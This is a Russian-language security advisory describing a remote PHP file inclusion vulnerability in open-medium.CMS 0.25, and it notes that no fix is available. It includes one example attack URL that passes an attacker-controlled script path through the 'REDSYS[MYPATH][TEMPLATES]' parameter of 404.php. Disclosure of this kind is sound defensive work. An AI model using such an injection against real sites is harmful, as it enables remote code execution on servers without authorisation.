PHP-инклюдинг в open-medium.CMS

Дата публикации:
31.05.2006
Дата изменения:
17.10.2006
Всего просмотров:
2312
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
open-medium.CMS 0.x
Уязвимые версии: open-medium.CMS 0.25, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "REDSYS[MYPATH][TEMPLATES]" в сценарии 404.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://victim/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts]

URL производителя: www.cms.open-medium.com/en/cms/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: open-medium (0.25) - Content Management System - Remote File Include Vulnerabilities

или введите имя

CAPTCHA